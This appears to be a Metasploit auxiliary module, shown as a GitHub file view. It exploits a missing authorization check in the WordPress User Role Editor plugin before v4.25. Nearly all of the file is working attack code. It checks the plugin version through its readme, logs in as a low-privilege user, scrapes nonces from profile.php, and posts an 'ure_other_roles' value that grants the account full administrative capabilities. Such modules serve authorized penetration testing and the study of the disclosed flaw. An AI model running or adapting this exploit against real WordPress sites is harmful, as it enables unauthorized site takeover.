174 lines
No EOL
7.9 KiB
Ruby
Executable file
174 lines
No EOL
7.9 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HTTP::Wordpress
|
|
|
|
def initialize(info = {})
|
|
super(update_info(
|
|
info,
|
|
'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
|
|
'Description' => %q{
|
|
The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
|
|
check within its update user profile functionality ("update" function, contained
|
|
within the "class-user-other-roles.php" module).
|
|
Instead of verifying whether the current user has the right to edit other users'
|
|
profiles ("edit_users" WP capability), the vulnerable function verifies whether the
|
|
current user has the rights to edit the user ("edit_user" WP function) specified by
|
|
the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
|
|
user id is the current user's id, this check is always bypassed (i.e. the current
|
|
user is always allowed to modify its profile).
|
|
This vulnerability allows an authenticated user to add arbitrary User Role Editor
|
|
roles to its profile, by specifying them via the "ure_other_roles" parameter within
|
|
the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
|
|
clicked).
|
|
By default, this module grants the specified WP user all administrative privileges,
|
|
existing within the context of the User Role Editor plugin.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'ethicalhack3r', # Vulnerability discovery
|
|
'Tomislav Paskalev' # Exploit development, metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['WPVDB', '8432'],
|
|
['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
|
|
],
|
|
'DisclosureDate' => 'Apr 05 2016',
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
|
|
OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
|
|
OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
|
|
OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
|
|
OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
|
|
OptString.new('USERNAME', [true, 'WordPress username']),
|
|
OptString.new('PASSWORD', [true, 'WordPress password']),
|
|
OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
|
|
])
|
|
end
|
|
|
|
# Detect the vulnerable plugin by enumerating its readme.txt file
|
|
def check
|
|
readmes = ['readme.txt', 'Readme.txt', 'README.txt']
|
|
|
|
res = nil
|
|
readmes.each do |readme_name|
|
|
readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
|
|
vprint_status("Checking #{readme_url}")
|
|
res = send_request_cgi(
|
|
'uri' => readme_url,
|
|
'method' => 'GET'
|
|
)
|
|
break if res && res.code == 200
|
|
end
|
|
|
|
if res.nil? || res.code != 200
|
|
# The readme.txt file does not exist
|
|
return Msf::Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
|
|
return version_res
|
|
end
|
|
|
|
def username
|
|
datastore['USERNAME']
|
|
end
|
|
|
|
def password
|
|
datastore['PASSWORD']
|
|
end
|
|
|
|
# Search for specified data within the provided HTTP response
|
|
def check_response(res, name, regex)
|
|
res.body =~ regex
|
|
result = $1
|
|
if result
|
|
print_good("#{peer} - WordPress - Getting data - #{name}")
|
|
else
|
|
vprint_error("#{peer} #{res.body}")
|
|
fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
|
|
end
|
|
return result
|
|
end
|
|
|
|
# Run the exploit
|
|
def run
|
|
# Check if the specified target is running WordPress
|
|
fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
|
|
|
|
# Authenticate to WordPress
|
|
print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
|
|
cookie = wordpress_login(username, password)
|
|
fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
|
|
store_valid_credential(user: username, private: password, proof: cookie)
|
|
print_good("#{peer} - WordPress - Authentication - OK")
|
|
|
|
# Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
|
|
url = normalize_uri(wordpress_url_backend, 'profile.php')
|
|
print_status("#{peer} - WordPress - Getting data - #{url}")
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => url,
|
|
'cookie' => cookie
|
|
})
|
|
|
|
if res and res.code == 200
|
|
wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
|
|
color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
|
|
checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
|
|
nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
|
|
display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option selected=\'selected\'\>(.+?(?=\<))\</)
|
|
email = check_response(res, "email", /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
|
|
user_id = check_response(res, "user_id", /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
|
|
else
|
|
fail_with("#{peer} - WordPress - Getting data - Server response (code #{res.code})")
|
|
end
|
|
|
|
# Send HTTP POST request - update the specified user's privileges
|
|
print_status("#{peer} - WordPress - Changing privs - #{username}")
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => url,
|
|
'vars_post' => {
|
|
'_wpnonce' => wp_nonce,
|
|
'_wp_http_referer' => URI::encode(url),
|
|
'from' => 'profile',
|
|
'checkuser_id' => checkuser_id,
|
|
'color-nonce' => color_nonce,
|
|
'admin_color' => 'fresh',
|
|
'admin_bar_front' => '1',
|
|
'first_name' => '',
|
|
'last_name' => '',
|
|
'nickname' => nickname,
|
|
'display_name' => display_name,
|
|
'email' => email,
|
|
'url' => '',
|
|
'description' => '',
|
|
'pass1' => '',
|
|
'pass2' => '',
|
|
'ure_other_roles' => datastore['PRIVILEGES'],
|
|
'action' => 'update',
|
|
'user_id' => user_id,
|
|
'submit' => 'Update+Profile'
|
|
},
|
|
'cookie' => cookie
|
|
})
|
|
|
|
# check outcome
|
|
if res and res.code == 302
|
|
print_good("#{peer} - WordPress - Changing privs - OK")
|
|
else
|
|
fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
|
|
end
|
|
end
|
|
end
|
|
|
|
# EoF |